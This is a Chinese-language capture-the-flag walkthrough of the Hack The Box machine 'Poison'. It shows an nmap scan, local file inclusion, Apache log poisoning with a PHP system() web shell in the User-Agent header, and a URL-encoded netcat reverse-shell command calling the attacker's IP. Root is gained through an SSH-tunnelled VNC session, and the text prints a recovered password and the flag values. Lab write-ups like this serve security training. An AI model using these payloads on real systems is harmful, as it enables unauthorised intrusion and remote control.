[Meachines] [Medium] poison LFI+日志投毒+VNC权限提升

信息收集

IP Address	Opening Ports
10.10.10.84	TCP:22,80

$ nmap -p- 10.10.10.84 --min-rate 1000 -sC -sV

22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

LFI & 日志投毒

http://10.10.10.84/browse.php?file=/etc/passwd

GET / HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_GET['cmd']); phpinfo(); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

http://10.10.10.84/browse.php?1=ls%20-la&file=/var/log/httpd-access.log

$ curl 'http://10.10.10.84/browse.php?1=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.16.24%2010032%20%3E%2Ftmp%2Ff&file=/var/log/httpd-access.log'

$ cat pwdbackup.txt

$ data=$(cat data); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data

Charix!2#4%6&8(0

$ su charix

$ ssh charix@10.10.10.84

User.txt

eaacdfb2d141b72a589233063604209c

权限提升

$ scp charix@10.10.10.84:/home/charix/secret.zip .

解压密码:Charix!2#4%6&8(0

$ file secret

VNC

% netstat -an -p tcp

5901是VNC端口，用于远程桌面访问。

% ps -auwwx | grep vnc

并且以ROOT权限运行

Xvnc :1:

这是 TightVNC 的 X 服务器进程。Xvnc 是一个 X 服务器，它允许在远程设备上运行图形界面。:1 指定了显示编号1。

-desktop X:

设置虚拟桌面的名称为 X。

-httpd /usr/local/share/tightvnc/classes:

指定 TightVNC 的 HTTP 服务器的目录，用于提供 VNC Java 客户端。

-auth /root/.Xauthority:

指定用于 X 服务器认证的授权文件路径。在这里是 /root/.Xauthority。

-geometry 1280x800:

指定虚拟桌面的分辨率为 1280x800。

-depth 24:

指定颜色深度为 24 位。

-rfbwait 120000:

设置在开始连接前等待客户端响应的时间为 120000 毫秒（即 120 秒）。

-rfbauth /root/.vnc/passwd:

指定用于 VNC 连接的认证文件，即 /root/.vnc/passwd，这个文件包含了 VNC 的密码。

-rfbport 5901:

指定 VNC 服务器使用的端口号为 5901。VNC 默认使用 5900 端口，:1 表示加1，故使用 5901 端口。

-localhost:

限制 VNC 服务器只能接受来自本地的连接。这意味着只能从本地系统连接到这个 VNC 实例。

-nolisten tcp :1:

禁止 X 服务器监听 TCP 连接。这增加了安全性，因为不会接受来自远程设备的 TCP 连接。

$ ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

$ vncviewer 127.0.0.1:5901 -passwd secret

Root.txt

716d04b188419cf2bb99d891272361f5